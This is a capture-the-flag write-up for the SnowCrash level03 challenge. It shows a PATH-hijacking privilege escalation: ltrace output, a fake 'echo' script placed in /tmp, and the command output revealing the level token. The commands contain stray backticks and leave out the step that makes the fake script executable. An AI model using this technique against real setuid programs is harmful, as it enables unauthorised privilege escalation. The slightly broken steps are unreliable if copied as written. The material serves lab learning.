SnowCrash Mission: Flag03

Objective: Retrieve the Level04 token to advance further in the SnowCrash challenge.

There's a suid binary (level03) in the home folder Running file Command on level03 file gives "setuid setgid ELF 32-bit LSB executable"

after executing ltrace to the binary

level03@SnowCrash:~$ ltrace ./level03

__libc_start_main(0x80484a4, 1, 0xbffff7b4, 0x8048510, 0x8048580 <unfinished ...>
getegid()                                        = 2003
geteuid()                                        = 2003
setresgid(2003, 2003, 2003, 0xb7e5ee55, 0xb7fed280) = 0
setresuid(2003, 2003, 2003, 0xb7e5ee55, 0xb7fed280) = 0
# system("/usr/bin/env echo Exploit me"Exploit me
 <unfinished ...>
--- SIGCHLD (Child exited) ---
<... system resumed> )                           = 0
+++ exited (status 0) +++

level03@SnowCrash:~$

It shows that the binary execute the command /usr/bin/env echo Exploit me

The echo call is done with relative path this means we can create our echo and inject it's path into PATH enviroment variable

level03@SnowCrash:~$ echo "/bin/getflag" > /tmp/echo
level03@SnowCrash:~$ PATH=/tmp:$PATH`
level03@SnowCrash:~$ ./level03`

Check flag.Here is your token : qi0maab88jeaj46qoumi7maus

level03@SnowCrash:~$

Writeup Writeup